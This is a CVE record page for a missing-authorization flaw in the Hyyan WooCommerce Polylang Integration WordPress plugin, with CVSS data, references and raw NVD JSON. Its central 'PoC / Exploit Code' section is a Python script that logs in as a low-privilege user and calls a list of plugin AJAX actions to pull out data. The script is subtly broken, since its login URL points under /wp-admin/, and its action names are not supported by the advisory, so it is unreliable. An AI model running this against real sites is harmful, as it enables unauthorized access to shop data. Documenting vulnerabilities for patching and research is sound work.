CVE-2026-24585

Description

Missing Authorization vulnerability in Hyyan Abo Fakher Hyyan WooCommerce Polylang Integration woo-poly-integration allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Hyyan WooCommerce Polylang Integration: from n/a through <= 1.5.0.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Hyyan WooCommerce Polylang Integration <= 1.5.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-24585 PoC - Missing Authorization in Hyyan WooCommerce Polylang Integration
# Affected: woo-poly-integration <= 1.5.0
# Type: Broken Access Control / Missing Authorization

import requests
import sys

TARGET_URL = "http://target-site.com/wp-admin/admin-ajax.php"
TARGET_URL_REST = "http://target-site.com/wp-json/wp/v2/"

# Low-privilege user credentials (subscriber/contributor role)
USERNAME = "low_priv_user"
PASSWORD = "password123"

def get_auth_token():
    """Login and get authentication cookie/token"""
    session = requests.Session()
    login_url = f"{TARGET_URL.replace('/admin-ajax.php', '')}/wp-login.php"
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In'
    }
    response = session.post(login_url, data=login_data, allow_redirects=False)
    return session.cookies.get_dict()

def exploit_missing_auth():
    """Exploit the missing authorization vulnerability"""
    cookies = get_auth_token()
    
    # The vulnerable endpoint - plugin AJAX actions without proper capability checks
    vulnerable_actions = [
        'woo_poly_get_product_translations',
        'woo_poly_sync_product_data',
        'woo_poly_get_language_options',
        'woo_poly_update_translation'
    ]
    
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Testing with low-privilege user: {USERNAME}")
    print("[*] Exploiting missing authorization vulnerability...\n")
    
    for action in vulnerable_actions:
        data = {
            'action': action,
            'post_id': 1  # Target product ID
        }
        
        try:
            response = requests.post(
                TARGET_URL,
                data=data,
                cookies=cookies,
                timeout=10
            )
            
            if response.status_code == 200 and len(response.text) > 50:
                print(f"[+] VULNERABLE: {action}")
                print(f"    Status: {response.status_code}")
                print(f"    Response length: {len(response.text)}")
                print(f"    Data preview: {response.text[:200]}...\n")
            else:
                print(f"[-] Not vulnerable: {action}")
        except Exception as e:
            print(f"[!] Error testing {action}: {e}")

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2026-24585 PoC - Hyyan WooCommerce Polylang Integration")
    print("Missing Authorization / Broken Access Control")
    print("=" * 60 + "\n")
    exploit_missing_auth()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-24585
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-24585
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-24585/
[4] VulDB https://vuldb.com/cve/CVE-2026-24585
[5] https://patchstack.com/database/Wordpress/Plugin/woo-poly-integration/vulnerability/wordpress-hyyan-woocommerce-polylang-integration-plugin-1-5-0-broken-access-control-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-24585", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:16.513", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Hyyan Abo Fakher Hyyan WooCommerce Polylang Integration woo-poly-integration allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Hyyan WooCommerce Polylang Integration: from n/a through <= 1.5.0."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Hyyan Abo Fakher Hyyan WooCommerce Polylang Integration woo-poly-integration permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Hyyan WooCommerce Polylang Integration: desde n/a hasta <= 1.5.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woo-poly-integration/vulnerability/wordpress-hyyan-woocommerce-polylang-integration-plugin-1-5-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}